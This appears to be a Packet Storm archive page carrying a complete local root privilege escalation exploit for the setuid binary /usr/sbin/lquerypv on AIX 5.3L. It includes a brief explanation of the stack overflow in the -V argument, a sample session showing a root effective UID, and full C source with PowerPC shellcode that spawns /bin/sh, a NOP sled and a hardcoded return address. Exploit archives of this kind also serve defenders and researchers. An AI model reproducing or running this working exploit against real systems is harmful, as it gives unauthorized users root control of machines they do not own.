exploit the possibilities

AIX 5.3L /usr/sbin/lquerypv Local Root Privilege Escalation

AIX 5.3L /usr/sbin/lquerypv Local Root Privilege Escalation
Posted Nov 16, 2020
Authored by Hacker Fantastic

AIX version 5.3L /usr/sbin/lquerypv local root privilege escalation exploit.

tags | exploit, local, root
systems | aix
MD5 | 404c3fced5ca1174299093282bd7c407

AIX 5.3L /usr/sbin/lquerypv Local Root Privilege Escalation

Change Mirror Download
/*AIX 5.3L /usr/sbin/lquerypv local root privilege escalation 
* ===========================================================
* AIX5.3L includes a setuid root binary "lquerypv" which contains a stack-based
* overflow in the handling of -V command line argument. However, prior to the
* vulnerability being triggered the binary drops privileges. On AIX you can
* restore the dropped privileges using seteuid() which results in a local root
* LPE vulnerability.
*
* e.g
* bash-4.4$ ls -al `which lquerypv`;id;uname -a;oslevel
* -r-sr-xr-x 1 root system 27160 Apr 28 2006 /usr/sbin/lquerypv
* uid=202(user) gid=1(staff)
* AIX aix53l 3 5 000772244C00
* 5.3.0.0
* bash-4.4$ ./aix53l-lquerypv
* [ AIX 5.3L /usr/sbin/lquerypv local root privilege escalation exploit
* # id
* uid=202(user) gid=1(staff) euid=0(root)
*
* -- Hacker Fantastic
* (https://hacker.house)
*/
#include <stdio.h>
#include <stdlib.h>
#include <memory.h>
#include <unistd.h>

char shellcode[]="\x7f\xff\xfb\x78" /* mr r31,r31 (nop) */
"\x7c\x84\x22\x78" /* xor r4,r4,r4 */
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
"\x40\x82\xff\xfd" /* bnel (setreuidcode) */
"\x7e\xa8\x02\xa6" /* mflr r21 */
"\x3a\xb5\x01\x40" /* cal r21,0x140(r21) */
"\x88\x55\xfe\xe0" /* lbz r2,-288(r21) */
"\x7e\x83\xa3\x78" /* mr r3,r20 */
"\x3a\xd5\xfe\xe4" /* cal r22,-284(r21) */
"\x7e\xc8\x03\xa6" /* mtlr r22 */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"\xaa\x06\xff\xff" /* 0xaa = seteuid 0x06 = execve */
"\x38\x75\xff\x04" /* cal r3,-252(r21) */
"\x38\x95\xff\x0c" /* cal r4,-244(r21) */
"\x7e\x85\xa3\x78" /* mr r5,r20 */
"\x90\x75\xff\x0c" /* st r3,-244(r21) */
"\x92\x95\xff\x10" /* st r20,-240(r21) */
"\x88\x55\xfe\xe1" /* lbz r2,-287(r21) */
"\x9a\x95\xff\x0b" /* stb r20,-245(r21) */
"\x4b\xff\xff\xd8" /* bl (setreuidcode+32) */
"/bin/sh";

int main(int argc,char* argv[]){
char *env[] = {NULL};
char *buffer = malloc(2048);
long ptr;
char *argp[] = {"lquerypv","-V",buffer,NULL};
setreuid(0,0);
if(!buffer){
printf("[ malloc() failure\n");
exit(-1);
}
printf("[ AIX 5.3L /usr/sbin/lquerypv local root privilege escalation exploit\n");
memset(buffer,0,2048);
memset(buffer,'\x90',1044);
ptr = (long)buffer + 1043;
memcpy((void*)ptr,"\x2f\xf2\x2b\x54",4); //0x2ff22b54
memcpy(buffer,(void*)&shellcode,strlen((char*)&shellcode));
execve("/usr/sbin/lquerypv",argp,env);
}

Login or Register to add favorites

File Archive:

May 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    1 Files
  • 2
    May 2nd
    4 Files
  • 3
    May 3rd
    26 Files
  • 4
    May 4th
    17 Files
  • 5
    May 5th
    3 Files
  • 6
    May 6th
    32 Files
  • 7
    May 7th
    11 Files
  • 8
    May 8th
    2 Files
  • 9
    May 9th
    2 Files
  • 10
    May 10th
    13 Files
  • 11
    May 11th
    17 Files
  • 12
    May 12th
    22 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    9 Files
  • 15
    May 15th
    2 Files
  • 16
    May 16th
    2 Files
  • 17
    May 17th
    21 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close